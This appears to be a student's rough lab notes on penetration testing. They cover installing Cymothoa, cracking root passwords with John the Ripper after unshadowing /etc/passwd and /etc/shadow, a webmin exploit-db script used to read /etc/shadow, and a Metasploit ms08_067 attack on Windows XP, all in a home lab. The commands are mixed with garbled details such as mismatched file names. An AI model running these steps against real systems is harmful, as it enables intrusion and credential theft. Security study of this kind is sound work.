conecting in virtual box and install cymothoa

• done by changing the network connection only menjai host adapter

•  then do open the application NC.,
  we connect ubuntu with applications nc

• and did also your settings in ubuntu

sorry I have not been able to install cymothoa in ubuntu., guidance please

how to know the root password using the JTR

• to crack the password file, just give the following commad : ./unshadow /etc/passwd /etc/shadow >pass

•  see these password you can give the following command: ./john pass

• it is time to show your root passwd by using the command. / john - show pass

and results., paswword your root is 123

testing John the Ripper

• run the application john the ripper

  write ls -l 
Displays the contents of a directory as the dir command in the DO

•  write ./ unshadow /etc/shadow > crack.db

• next cat crack.bd to display

• next execution in JTR

• and next execution in incremental and user root.

KO

exploitation in Privilege Escalatian

1. The first place to start is looking for information gathering and service enumeration by using nmap.

 from the nmap port where we can find the most discovered open port
that is 80, 445, 22, 139, 10000

•  we now try to open 192.168.0.112 and coupled to 10000

written there. told to enter a username and password..,
  

    2.  This second phase we search for the VA could use the nessus and exploitdb

 in nessus :

 

ALL report nessus: http://pastehtml.com/view/bmhkcdvwv.rtxt



in exploitdb :

• go to applications exploiting db

"./" this command to execute
write searchsploit  webmin
why webmin., because it's written on 192.168.0.112:10000 login to webmin

• next then we do the cp command to get into the next stage

then write the command cp platforms/multiple/remote/2010.pl ~

• subsequent examination by using the ls command to find out 2017.pl already entered.

• next write perl 2017.pl  to determine the target 0 -> HTTP, 1 -> HTPPS

• then we do attacking 192.168.0.112 on port 10000 with the name of the file / etc / shadow type of target 0

..^

exploits WinXPpro using msfconsole (update)

The first we do is running virtual box:
next klick device select Network. on the tab Attached to : select Host-only Adapter. klick OK

•  next open  your command Prompt and write ip config

• we can also use Nmap to see ipconfig:

 

• try doing a ping to ip address windows

• then we do scanning using nessus
  This is useful to know the vulnerability

• wait until the process is complete

• after scanning is complete, let us analyze

• we first find out the their susceptibility

klik total highest total port

and now we find the highest levels of vulnerability

all report here: http://pastehtml.com/view/bmdfpksxh.rtxt

• next., running your console., and write msfconsole

 write use exploit/windows/smb/ms08_067_netapi and set lhos and rhost

• after that we directly exploit

• time for us to execute:

write execute -f cmd.exe -M -i .. enter the you folder .

• and check in windows

• here I am trying something new

after we successfully execute
we try to turn it off 

lessons january, 27, 20 012

1.  service enumeration

what is a service enumeration
" Intensive study of the target, the search for a user account is valid, and share network resources, and applications for which protection is weak. "
 for this service enumeration we can use nmap, zenmap and nessus
example :
 running your windows in virtual box:
and klick command Prompt., and next write ipconfig.
and will show your ip address

next open your aplication Zenmap and write your ip adres windows. and klick scan

 next open your aplication nmap and write "nmap -A -T4 ip adres windows". and klick scan:
look this

 in nessus:

 2. vulnerability identification (cve, osvdb)
Here we will identify existing vulnerabilities., we can use the application CVE and OSVDB

 3. vulnerability analysis
 Here we will analyze what are its vulnerabilities.,

we can use smb port 445

 

4. gaining acces
Gaining access  is Getting more data to start trying to access the target. Cover peek and grab passwords, password guessing, and perform a buffer overflow.   

5. use exploit repositiry 

Exploit is a software that attacks the fragility of security (security vulnerability) are specific but not always aim to launch an unwanted action. Many computer security researcher using the exploit to demonstrate that a system has a vulnerability.
There is a body of researchers who work with the software manufacturer. Researchers were tasked to find the fragility of a software and if they find it, they report the findings to the manufacturers so that manufacturers can take action. However, sometimes exploit being part of a malware attack in charge of security vulnerability.

we can use exploid.db

etc:

 

6. metasploit
The Metasploit Framework is a development platform to create security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers around the world. The framework is written in the Ruby programming language and includes components written in C and assembler. 
In metasploit there are 2 types of things that need to be noticed, namely payload and exploitnya.

• Exploit = weakness of the target, usually in check with nmap

• payload = type of attack will be launched to exploit it. 

 we can use :

#msfconsol

# msfcli

#msfgui

etc: